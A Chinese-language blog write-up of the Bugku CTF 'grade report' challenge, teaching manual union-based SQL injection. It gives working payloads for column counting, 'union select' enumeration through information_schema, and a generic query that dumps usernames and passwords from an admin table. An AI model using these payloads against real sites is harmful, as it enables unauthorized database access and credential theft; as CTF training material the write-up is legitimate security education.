Bugku-CTF之成绩单(快来查查成绩吧)
Day18
成绩单
快来查查成绩吧
http://123.206.87.240:8002/chengjidan/
本题要点:sql手注、查询基础命令
首先查看一下源码
没什么有用的信息
看到表单类型,我们应该想到sql注入
先对它进行一个判断
1.先测试正常数据,用火狐的hackbar插件post请求,一切正常
2.加上单引号’则数据为空,但是再加上注释符#就又正常了
3. 然后尝试获取列数,因为已经有名字和三科成绩了,所以就测试4或者更高,得知是4列
因为构造id=1' order by 5#时,没有正常回显,id=1' order by 4#时,正常回显,所以判断有4列。
4.尝试联合查询,记得把前面的查询数据置空,写成id=0即可,显示正常,说明确确实实存在这四列数据
对于刚接触sql注入的初学者来说,大家可以多试几次,比如将id分别换成1,2,3 .....
我们可以看到当id=4的时候,页面就和当id=0的时候回显一样了
5.下面我们开始猜解数据库名, 数据库的用户,数据库的版本(没有顺序,把1留出来只是因为表单看起来顺眼而已....)
6.根据数据库skctf_flag去查询表名
id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user(),version()#
这是一个固定格式~
注意,这里穿插一个知识点!!!!!!
union select 手工注入
mysql中的information_schema 结构用来存储数据库系统信息
information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。
SCHEMATA 存储数据库名的,
关键字段:SCHEMA_NAME,表示数据库名称
TABLES 存储表名的
关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
COLUMNS 存储字段名的
关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
爆所有数据名
select group_concat(SCHEMA_NAME) from information_schema.schemata
得到当前库的所有表
select group_concat(table_name) from information_schema.tables where table_schema=database()
得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572
select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572
得到字段具体的值 select group_concat(username,0x3a,password) from adminuser
补充结束
7.然后根据fl4g表去查询列名
得到字段skctf_flag,即为列名
8.这样我们拿到 列名 之后直接去获取数据
完成!
--------------------- ┑( ̄Д  ̄)┍ --------------------------
作者:0yst3r[一只在安全领域努力奋斗的小菜鸡]
来源:博客园[ https://www.cnblogs.com/0yst3r-2046/ ] 引用时请注明来源哦~
(๑•̀ㅂ•́)و✧ヽ(✿゚▽゚)ノ(*^▽^*) φ(≧ω≦*)♪
如果本文对你有用,本人不胜欢喜。
The world is your oyster.